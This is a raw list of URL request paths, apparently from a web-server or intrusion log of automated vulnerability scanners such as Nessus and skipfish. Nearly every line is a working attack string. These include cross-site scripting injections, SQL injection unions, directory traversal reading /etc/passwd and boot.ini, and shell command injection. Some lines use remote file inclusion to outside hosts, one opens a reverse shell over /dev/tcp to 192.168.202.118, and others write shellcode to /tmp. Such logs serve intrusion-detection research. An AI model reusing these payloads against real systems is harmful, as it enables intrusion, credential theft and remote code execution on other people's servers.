src=\"javascript:alert(cross_site_scripting.nasl);\">\n/postnuke/html/modules.php?op=modload&name=news&file=article&sid=<script>alert('vulnerable');</script>\n/scripts/search.scr.php?globals[pth][classes]=http://cirt.net/rfiinc.txt??\n/en-us/account/index.php?act=arcade&do=stats&gameid=1'\n/g8nu2yy7.kspx?<script>cross_site_scripting.nasl</script>\n/javascript/document.sfish\n/help.php?q=\"ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/7dbjwpw6.nsf?<script>cross_site_scripting.nasl</script>\n/ny1b3qq4.x?<script>cross_site_scripting.nasl</script>\n/faq.php?action=&type=view&s=&id=-1' union select 0,1323875856,0,0,0,0,0--\n/scs86g1p.cfc?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/cgi-home/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/oncixdescription/\n/en-us/oie504mr.x?<script>document.cookie=\"testtpby=7052;\"</script>\n/main.php?logout=&ping;-w;7000;-n;1;4.3.2.1&rem;\n/search.jsp?q=%\"<script>alert(1331905049)</script>\n/scripts/man-cgi?section=0&topic=ls;id\n/xsskj3/\n/main.php?stuff='\\x0auname\\x09>q47233887\\x09#\n/examples/jsp/jsp2/el/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/1r8cfrlf.kspx?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/scripts/mensajeitor.php\n/passwdage/\n/en-us/splunk_413_404error_xss.nasl-1331904921\n/bl8sefdm.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/banners.php?op=emailstats&cid=1 and passwd like 'a%'/*\n/script/\n/scripts/breakcal/calendar.cgi\n/javascript/pipermail.exe\n/examples/jsp/checkbox/index.php?id='union/**/select/**/0,0,1364632458,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/bmeun223.cfm?<script>document.cookie=\"testhhwu=7044;\"</script>\n/t3af3tdz.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/yef5f3d5.jsp?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q72116194&frm_user=&scr_height=&scr_width=\n/scripts/rot13sj.cgi?/etc/passwd\n/examples/jsp/jsp2/jspx/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n/main.php?stuff=\";rm q85142671 #\n/ywaxntrx.jspa?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"ver\\xa0>q74458178&rem\\xa0\n/<meta http-equiv=set-cookie content=\"testggad=2000\">\n/eg2u8pbv.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/k0pxpjgnimox.php\n/phpmyadmin/way-board/way-board.cgi?db=/etc/passwd\\x00\n/cacti/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/en-us/n9xlumt5.html?<script>cross_site_scripting.nasl</script>\n/manager/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- \n/phpmyadminsearch_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/edit.jsp?page=user&editor=../../../install\n/bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/examples/jsp/sessions/supporter/tupdate.php?groupid=change&sg='\n/bemarket/postscript/postscript.php?p_mode=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/scriptpath/footers.php?tinybb_footers=http://192.168.202.118:8080/zz5thkvtmlgl?\n/manager/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/grey's anatomy 3x09 repack hdtv/\n/en-us/i686v90l.do?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/phpmyadmin/scripts/setup.php\n/<script>document.cookie=\"testylfu=1313;\"</script>\n/7dbjwpw6.idc?<script>cross_site_scripting.nasl</script>\n/addvip.php?msetstr[\"progsdir\"]=http://192.168.202.96:8080/swgnhpydbq0t?\n/esmozg5d.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/property.exe\n/prescription-xanax/\n/if69ddo1.php?<script>document.cookie=\"testiabz=5220;\"</script>\n/scripts/troops.cgi\n/javascript/win32.exe\n/javascript/compliance.exe\n/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,403538393,1441170175,1,1,1,1,1--&blogid=1\n/phpmyadmin/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/examples/jsp/sessions/index.php?template=../../../loudblog/custom/config.php\\x00\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908691&lang_crm=../../vtigerservice.php\\x00\n/main.php?stuff=\"&del\\x0cq27346825&rem\\x0c\n/9o6g5vkn.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/'stoked' gets to the heart of extreme athletics/\n/0u75ldxq.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/config.php?path[docroot]=/etc/passwd\\x00\n/fmnveedu.idc?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/help.php?q=\"&ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/javascript/pii.exe\n/javascript/ubb.exe\n/j4drbkil.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/index.php?show=/etc/passwd\n/1qwv2p5p.x?<script>document.cookie=\"testvqcy=252;\"</script>\n/scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/ipb5ri?\n/main.php?stuff=\"&rm q23549573 #\n/script pack/\n/rpxyx07v.dll?<script>document.cookie=\"testbnli=1975;\"</script>\n/pohentermine-prescription/\n/eventum/forgot_password.php?email=\\\"><script>alert(document.cookie)</script>\n/ddoworrl.do?<script>document.cookie=\"testvlau=8517;\"</script>\n/megabook/admin.cgi?login=<script>alert('vulnerable')</script>\n/initscripts/\n/gazette-subscription/\n/htbin/sensepost.exe?/c+dir\n/bmeun223.idc?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/examples/jsp/jsp2/jspx/showcat.php?cat=1'\n/b5xdqgz2.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/index.php?entry='\n/javascript/contents.exe\n/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/javascript/decl.exe\n/recordings/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331918989')</script>\n/ttxssh2_210/\n/projects/1/repository/annotate?rev=`0<&208-;exec 208<>/dev/tcp/192.168.202.118/26475;sh <&208 >&208 2>&208`\n/en-us/7o5qp766.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=ver\\x0c>q59849218&rem\\x0c\n/scripts/secure.php?cfgprogdir=/etc/passwd\\x00\n/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331908835',null,null,null,null --\n/cgi.cgi/fileseek.cgi?foot=;cat /etc/passwd&head=\n/path_script/createurl.php?formurl=http://192.168.202.96:8080/swgnhpydbq0t?\n/index.php?op=default&date=200607' union select 1,1849014202,1,1,1,1,1,1,1,1--&blogid=1\n/xnoscript/\n/cacti/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/examples/servlets/servlet/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/javascript/tuscany.exe\n/main.php?stuff=ver,>q65716768&rem,\n/zv8tv7h8.asp?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/main.php?stuff=\"ping,-w,7000,-n,1,4.3.2.1|rem,\n/help.php?q=\"\\x0duname >q75726259 #\n/v3axg1p8.idc?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/top.php?stuff=\"ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/main.php?logout=\"del\\x0cq37726783&rem\\x0c\n/texis.exe/?-dump\n/launch.jsp?nfuse_application=<script>alert('vulnerable')</script>\n/phpmyadmin/index.php/1'\n/examples/jsp/jsp2/el/index.php?configfile=../../../../../../../../../etc/passwd\n/javascript/.htaccess.sfish/''''\"\"\"\"\n/en-us/9kr0ih0v.dll?<script>document.cookie=\"testzgnm=1183;\"</script>\n/cgi-home/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/scripts/axdgpyi2bn6f.php3\n/fcgi-bin/gwweb.exe?help=bad-request\n/top.php?stuff=\"&del\\xa0q12371867&rem\\xa0\n/examples/jsp/checkbox/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_wfppkgt4]));die;/*\n/nyvbv05h.html?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/cgi-bin/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/chat/register.php?register=yes&username=overg&email=<script>alert (\\\"vulnerable\\\")</script>&email1=<script>alert (\\\"vulnerable\\\")</script>\n/scripts/image.php?src=system/config/localconfig.php\n/archive.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8??\n/..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/main.php?frm_daynight=q51426141&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=\n/bzuf9ozq.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/boilerplate.asp?nfuse_template=../../boot.ini&amp;nfuse_currentfolder=/sslx0020directories|-|0|404_object_not_found\n/<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/index.php?err=3&email=\\\"><script>alert(document.cookie)</script>\n/examples/jsp/num/admin/configset.php?settings_dir=/etc/passwd\\x00\n/cgi-bin/main.cgi?board=free_board&command=down_load&filename=../../../../../../../../../../etc/passwd\n/help.php?q=\"sleep\\x097\\x09#\n/ywaxntrx.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/home/search.asp?nchannel='1\n/moore's_law/\n/cgi-perl/texis.exe/junk\n/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331909370,1,1,1,1,1,1,1--&blogid=1\n/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n/zqqemp6j.htm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/remindpasswd\n/examples/jsp/colors/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/main.php?stuff=\"\\x0adel\\x09q48139983\\x09#\n/cgi-bin/fileseek2.cgi?head=;cat /etc/passwd|&foot=\n/examples/jsp/jsp2/jspx/index.php?string='\n/javascript/info.exe\n/javascript/.passwd.pfx\n/scripts/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n/tukodz3j.cgi?<script>cross_site_scripting.nasl</script>\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"vj\\0001j\\0002\\0211\\0341j\\0001jfx\\0133\\0315\\0200\\0222\" >> /tmp/ldlchhikup0;echo|awstats247374.txt\n/ows-bin/r.cgi?file=../../../../../../../../../../etc/passwd\n<script>document.cookie=\"testtbjy=7334;\"</script>\n/jnt3f86c.kspx?<script>document.cookie=\"testcmax=9270;\"</script>\n/search.aspx?keywords=<script>alert(\"413385588094\")</script>\n/en-us/jnv890lt.nsf?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=;sleep 9 #\n/help.php?q='|sleep 8 #\n/examples/jsp/colors/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n/cacti/htmlscript?../../../../../../../../../etc/passwd\n/help.php?q=\"&sleep\\x099\\x09#\n/cgi-bin/starnet/addons/slideshow_full.php?album_name='1731917543\n/javascript/_source.exe\n/m4kkjf8l.aspx?<script>document.cookie=\"testyglc=8988;\"</script>\n/zln2hm2z.aspx?<script>document.cookie=\"testblcp=8120;\"</script>\n/help.php?q=\"&del q44114596 #\n/javascript/view.exe\n/cgi-bin/msmmask.exe?mask=/junk334\n/recordings/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/manager/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/top.php?stuff=ver\\x09>q92179245&rem\\x09\n/jnt3f86c.php3?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/scripts/printenv\n/javascript/www2.exe\n/top.php?stuff=\"\\x0drm\\x09q52865653\\x09#\n/javascript/.passwd.bin\n/main.php?stuff=\"|ping,-w,8000,-n,1,1.2.3.4|rem,\n/top.php?stuff=\"\\x0auname\\x09>q52122221\\x09#\n/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/cgis/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/en-us/account/index.php?templates_dir=/etc/passwd\\x00\n/0rufe52p.idc?<script>cross_site_scripting.nasl</script>\n/cgi-home/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/en-us/n9xlumt5.dll?<script>cross_site_scripting.nasl</script>\n/cgi-bin/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/v3axg1p8.nsf?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/scripts/tomcat_proxy_directory_traversal.nasl1332009307\n/<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/examples/jsp/error/wa.exe?debug-show-version\n/miz4r5hz.nsf?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/fo564rei.php3?<script>cross_site_scripting.nasl</script>\n/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331923203,1242183873 -- \n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+a+1f4+>>ctdn\n/javascript/logo.exe\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/frznctvhi0i5?\\x00\n/path_script/createurl.php?formurl=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/cgi-bin/search.jsp?q=%\"<script>alert(1332010405)</script>\n/examples/jsp/colors/search.php?submit=true&search=');\n/help.php?q=\"rm\\x0cq65994111&rem\\x0c\n/examples/jsp/sessions/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/help.php?q=\"\\x0dsleep\\x097\\x09#\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.118:8080/zz5thkvtmlgl?\n/en-us/account/sendcard.php?view=1&id='sendcard_sql.nasl\n/de3v2dd9.html?<script>cross_site_scripting.nasl</script>\n/h5i6crm3.cgi?<script>document.cookie=\"testlihk=7070;\"</script>\n/cacti/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/javascript/.htpasswd.sfish/9-8\n/o35zot2r.php?<script>cross_site_scripting.nasl</script>\n/javascript/jboss.exe\n<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/scripts/webnews.pl\n/javascript/dmsdump.exe\n/scripts/tsweb/\n/scripts/search.jsp?q=%\"<script>alert(1332009303)</script>\n/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_6drqhnv_]));die;/*\n/b4vng02k.nsf?<script>document.cookie=\"testtrlh=3672;\"</script>\n/javascript/survey.exe\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;/tmp/xjmtpvepcz;\"\n/j4oqyvga.php?<script>cross_site_scripting.nasl</script>\n/zroo33l4.dll?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/main.php?logout=\"\\x0drm q33212666 #\n/top.php?stuff=\"ver >q85581856&rem \n/main.php?logout=;sleep 7 #\n/main.inc.php?pathtoscript=@rfiurl\n/main.php?stuff=\"del,q26668686&rem,\n/manager/texis.exe/nessus\n/n1afe1y6.kspx?<script>cross_site_scripting.nasl</script>\n/w4996nr0.nsf?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/examples/jsp/jsp2/jspx/shopper.cgi?newpage=../../../../../../etc/passwd\n/subscription-management/\n/javascript/net.exe\n/main.php?logout=\"&ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/javascript/dba.exe\n/82q7ywa8.cfm?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/u8yiqilu.kspx?<script>document.cookie=\"testswjp=6010;\"</script>\n/en-us/account/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print \"content-type: text/plain\\x0d\\x0a\\x0d\\x0a\";system(id)&action=logout\n/javascript/jbossws.exe\n/help.php?q='rm q41634876 #\n/top.php?stuff=\"&sleep 8 #\n/javascript/trailers.exe\n/examples/jsp/jsp2/el/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/tothemaxss/\n/examples/jsp/checkbox/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/drhcprxk.exe|dir\n/examples/jsp/num/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/scripts/samples/search/qfullhit.htw\n/index.php?p=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini\\x00\n/john battelle's searchblog/\n/en-us/hipkz026.cfm?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/w4996nr0.dll?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/en-us/hipkz026.aspx?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|\n/en-us/<script>cross_site_scripting.nasl</script>.php3\n/hostadmin/?page='\n/javascript/2009.exe\n/tocjscript1/\n/recordings/forumdisplay.php?fid=21\"><script>x</script>\n/d7ktpmcq.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/1331904972-ror_session_fixation.nasl\n/u8yiqilu.do?<script>document.cookie=\"testswjp=6010;\"</script>\n/recordings/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/en-us/hipkz026.mscgi?<script>document.cookie=\"testyrbs=2855;\"</script>\n/top.php?stuff=\"ver&rem\\xa0\n/main.php?stuff=\"|ping -w 9000 -n 1 4.3.2.1|rem \n/top.php?stuff='\\x0adel\\x09q23871271\\x09#\n/main.php?stuff=\";sleep\\x098\\x09#\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;chmod+555+/tmp/ukirnkmpbn;\"\n/en-us/<script>cross_site_scripting.nasl</script>.jspa\n/cgi-bin/index.php?op=default&date=200607' union select 1,1759684664,1,1,1,1,1,1,1,1--&blogid=1\n/hjdzm96v.htm?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/examples/jsp/colors/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/en-us/account/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/abouttrialsubscription/\n/path_script/createurl.php?formurl=http://cirt.net/rfiinc.txt?\n/rv98iwjp.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/faq.php?action=&type=view&s=&id=-1' union select 0,1013365063,0,0,0,0,0--\n/backupscript/\n/fpnpp5zg.cgi?<meta http-equiv=set-cookie content=\"testyias=101\">\n/m5103snj.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/javascript/get.exe\n/en-us/manager/launcher/apps/local?msgid=8839950.734222518743&amp;ns=launcher&amp;redirecting=true\n/cacti/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n/sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>\n/options.php?optpage=<script>alert('vulnerable!')</script>\n/mpgscript/\n/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331909424,4--&blog=1\n/examples/jsp/checkbox/kb.cgi?view='&lang=en\n/examples/jsp/jsp2/jspx/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/tomcat-docs/appdev/sample/web/hello.jsp?test=<script>alert(tomcat_sample_hello_xss.nasl)</script>\n/admin/index.php?path_to_script=http://192.168.202.96:8080/4dckqcc0acprbz??&cmd=ls\n/_vti_bin/..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/rpc/..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/javascript/toggle.exe\n/javascript/f.exe\n/phpmyadmin/documentation.html?phpmyadmin=print(md5(acunetix_wvs_security_test));die();/*\n/recordings/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file&currentfolder=/flkzzubocd.jsp\\x00\n/nyvbv05h.pl?<script>document.cookie=\"testftxz=5980;\"</script>\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"vj\\0001j\\0002\\0211\\0341j\\0001jfx\\0133\\0315\\0200\\0222\" >> /tmp/gjvtlghpjb0;echo|awstats360621.txt\n/vac1l5vm.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/sources/functions.php?root_path=/etc/passwd\\x00\n/\"france 24\"/\n/recordings/smpwservicescgi.exe\n/cgi-bin/snpfiltered.pl?t=c&u=<script>foo</script>\n/examples/jsp/num/index.php?id=urjhxcl19w'\n/prescript/\n/javascript/cars.exe\n/manager/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>\n/javascript/document.war\n/scripts/sc877q2pzqne.shtml\n/phpmyadmin/demos/demo.browse.php?filename=/etc/passwd\n/vhzmaia2.php?<script>document.cookie=\"testkogj=3979;\"</script>\n/r3le3om5.pl?<script>cross_site_scripting.nasl</script>\n/hipkz026.exe?<script>document.cookie=\"testyrbs=2855;\"</script>\n/cgi.cgi/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/.htpasswd\n/scripts/basilix.php\n/jsp-examples/cal/cal2.jsp?time=8am<script>alert(\"tomcat_sample_cal2_xss.nasl\")</script>\n/j734qobz.idc?<script>cross_site_scripting.nasl</script>\n/bin/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331905161\n/9kr0ih0v.exe?<script>document.cookie=\"testzgnm=1183;\"</script>\n/1r8cfrlf.php?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/main.php?stuff=ping;-w;11000;-n;1;4.3.2.1|rem;\n/rubberstampsscriptalphabet/\n/addvip.php?msetstr[\"progsdir\"]=http://192.168.202.96:8080/llumt7msyau5y?\n/main.php?logout=\"rm\\x0bq12574322&rem\\x0b\n/i7prbs22.html?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/scripts/wihphoto/start.php\n/weq93ppb.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zln2hm2z.fts?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/ghswfouu.jsp?<script>document.cookie=\"testsqmm=5713;\"</script>\n/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/y8pmygrp.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='uname >q24953383 #\n/manager/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/cgi-bin/prn/../../../../../../../../../winnt/system32/ipconfig.exe\n/help.php?q=;rm\\x09q81281166\\x09#\n/examples/jsp/checkbox/index.php?cat_select=<script>foo</script>\n/servlet/webacc?user.lang=<script>foo</script>\n/help.php?q=\"ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/xfkun1ku.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/post.exe\n/en-us/oie504mr.cfm?<script>document.cookie=\"testtpby=7052;\"</script>\n/hrttz9fj.htm?<script>document.cookie=\"testtbjy=7334;\"</script>\n/aj3pf49c.jspa?<script>document.cookie=\"testnofv=4170;\"</script>\n/javascript/htpasswd.c\n/copying/</p><body><script src=http://www.example.com/test?rnd=q64711831></script><p>\n/javascript/sl.exe\n/examples/jsp/jsp2/jspx/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/javascript/.web.exe\n/zln2hm2z.htm?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/ju0u7kfo.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bmeun223.pl?<script>document.cookie=\"testhhwu=7044;\"</script>\n/ht8pn8uq.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q='\\x0adel\\x09q79344163\\x09#\n/help.php?q=\"ping;-w;10000;-n;1;1.2.3.4|rem;\n/.../.../.../.../.../.../.../.../.../windows/win.ini\n/examples/servlets/servlet/starnet/addons/slideshow_full.php?album_name='1978429620\n/vac1l5vm.php3?<script>cross_site_scripting.nasl</script>\n/javascript/presentations.exe\n/help.php?q=\"rm q92991511 #\n/xsqln7eb.php3?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/script/ident/loginliste.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?\n/33y9gcqq.x?<script>document.cookie=\"testnvxc=4301;\"</script>\n/en-us/account/index.php?op=default&date=200607' union select 1,674790948,1,1,1,1,1,1,1,1--&blogid=1\n/javascript/monitor.exe\n/scripts/h3d1n9eaqxv3.html\n/examples/jsp/jsp2/jspx/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n/xssxmltest/\n/help.php?q=\"&uname #\n/dslpwt15.php3?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/examples/servlets/servlet/al_initialize.php?alpath=/etc/passwd\\x00\n/ao22ww7y.php3?<script>document.cookie=\"testqppc=8767;\"</script>\n/cacti/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/7o5qp766.cfm?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"ver\\xa0>q32937989&rem\\xa0\n/scripts/icat\n/6wb70v0b.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/5qnlm5z2.jspa?<script>document.cookie=\"testsixi=8451;\"</script>\n/javascript/hipaa.exe\n/manager/faq.php?action=&type=view&s=&id=-1' union select 0,348320449,0,0,0,0,0--\n/if69ddo1.mscgi?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/scripts/faxsurvey?cat /etc/passwd\n/javascript/filez.exe\n/script_path/config.inc.php?_path=http://192.168.202.96:8080/4dckqcc0acprbz??\n/en-us/account/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/scripts/file.php?path=/etc/passwd\\x00\n/6wb70v0b.mscgi?<script>cross_site_scripting.nasl</script>\n/iktok2bw.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/jnv890lt.cfc?<script>cross_site_scripting.nasl</script>\n/cgi-bin/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/r3le3om5.cfm?<script>cross_site_scripting.nasl</script>\n/main.php?logout=';rm\\x09q16263765\\x09#\n/recordings/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/main.php?stuff=\"\\x0arm\\x09q48139983\\x09#\n/nigdyniewieszcomo\\xbfeszzyska\\xe6atakwieledostraceniajest:&#40;/\n/scripts/bveygnpo6hkw.pl\n/j4drbkil.fts?<script>cross_site_scripting.nasl</script>\n/javascript/gump.exe\n/<script>cross_site_scripting.nasl</script>.nsf\n/main.php?logout=;del\\x09q38215685\\x09#\n/<script>document.cookie=\"testxagh=6987;\"</script>\n/en-us/fo564rei.x?<script>cross_site_scripting.nasl</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+8b+ec+50+60+6a+04+5a+50+8b+dc+e8+41+00+00+00+6a+00+68+6c+6c+6f+63+68+75+61++>>ctdn\n/<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/javascript/definition.exe\n/nyvbv05h.x?<script>document.cookie=\"testftxz=5980;\"</script>\n/en-us/account/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n/help.php?q='\\x0adel q19373947 #\n/javascript/rhtml.exe\n/t7tm4m0b.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331909287')</script>\n/roads/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd\\x00\n/javascript/document.gz\n/addvip.php?msetstr[\"progsdir\"]=http://192.168.202.96:8080/txenjrxf3?\n/javascript/assets.exe\n/fo564rei.mscgi?<script>cross_site_scripting.nasl</script>\n/cgi-bin/index.php?id='union/**/select/**/0,0,763560836,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/zmvq66jy.nsf?<script>cross_site_scripting.nasl</script>\n/javascript/space.exe\n/edzaia0i.dll?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/index.php?site=../../../../../../../../etc/passwd\\x00\n/jw64yq8u.cfm?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/cgi-bin/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat 